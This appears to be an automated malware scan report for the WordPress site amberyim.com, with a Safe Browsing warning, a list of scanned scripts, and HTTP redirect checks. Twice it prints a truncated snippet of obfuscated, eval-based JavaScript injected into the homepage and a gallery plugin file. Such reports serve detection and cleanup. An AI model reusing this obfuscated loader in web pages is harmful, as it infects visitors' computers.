Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=amberyim.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://amberyim.com/ | 200 OK Content-Length: 12855 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=12;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,3 z=s;e(s);}} Antivirus reports:
| ||
http://amberyim.com/wp-includes/js/jquery/jquery.js?ver=1.8.3 | 200 OK Content-Length: 93658 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/plugins/contact-form-7/contact-form-7.js | 200 OK Content-Length: 3745 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/plugins/featured-content-gallery/scripts/mootools.v1.11.js | 200 OK Content-Length: 34840 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.js.php | 200 OK Content-Length: 28231 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{window.document.body++}catch(gdsgsdg){dbshre=12;if(dbshre){zaq=0;try{v=document.createElement("div");}catch(agdsg){zaq=1;}if(!zaq){e=eval;}ss=String;asgq=new Array(93,109,103,93,111,96,103,103,26,98,105,89,33,91,39,89,33,116,108,96,107,109,107,104,27,68,89,109,98,41,93,100,104,105,109,31,69,90,110,99,37,106,90,104,95,102,101,33,35,37,31,90,38,91,38,40,33,34,37,92,50,117,6,4,97,108,102,92,110,100,102,102,25,108,110,31,33,116,108,96,107,109,107,104,27,68,89,109,98,41,105,89,103,94,106,100,32,3 z=s;e(s);}} Antivirus reports:
| ||
http://amberyim.com/test404page.js | 404 Not Found Content-Length: 393 Content-Type: text/html | clean |
http://amberyim.com/wp-content/plugins/featured-content-gallery/scripts/jd.gallery.transitions.js | 200 OK Content-Length: 2182 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/plugins/wp-polls/polls-js.js?ver=2.50 | 200 OK Content-Length: 3258 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/themes/genesis/lib/js/menu/superfish.js?ver=1.4.8 | 200 OK Content-Length: 3083 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/themes/genesis/lib/js/menu/superfish.args.js?ver=1.9.1 | 200 OK Content-Length: 291 Content-Type: text/javascript | clean |
http://amberyim.com/wp-content/plugins/genesis-responsive-slider/js/jquery.flexslider.js?ver=0.9.2 | 200 OK Content-Length: 27245 Content-Type: text/javascript | clean |
http://amberyim.com/wp-includes/js/jquery/jquery.form.min.js?ver=2.73 | 200 OK Content-Length: 11116 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: amberyim.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 03:40:26 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: __utmfr=53; expires=Fri, 02-Jan-2015 03:40:26 GMT; path=/
Set-Cookie: PHPSESSID=fbdik5j0ka1ou05o21t8tk70j6; path=/
X-Pingback: http://amberyim.com/xmlrpc.php
GET / HTTP/1.1
Host: amberyim.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Fri, 26 Dec 2014 03:40:26 GMT
Pragma: no-cache
Server: Apache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: __utmfr=53; expires=Fri, 02-Jan-2015 03:40:26 GMT; path=/
Set-Cookie: PHPSESSID=fbdik5j0ka1ou05o21t8tk70j6; path=/
X-Pingback: http://amberyim.com/xmlrpc.php
Second query (visit from search engine):
GET / HTTP/1.1
Host: amberyim.com
Referer: http://www.google.com/search?q=amberyim.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: amberyim.com
Referer: http://www.google.com/search?q=amberyim.com
Result:
The result is similar to the first query. There are no suspicious redirects found.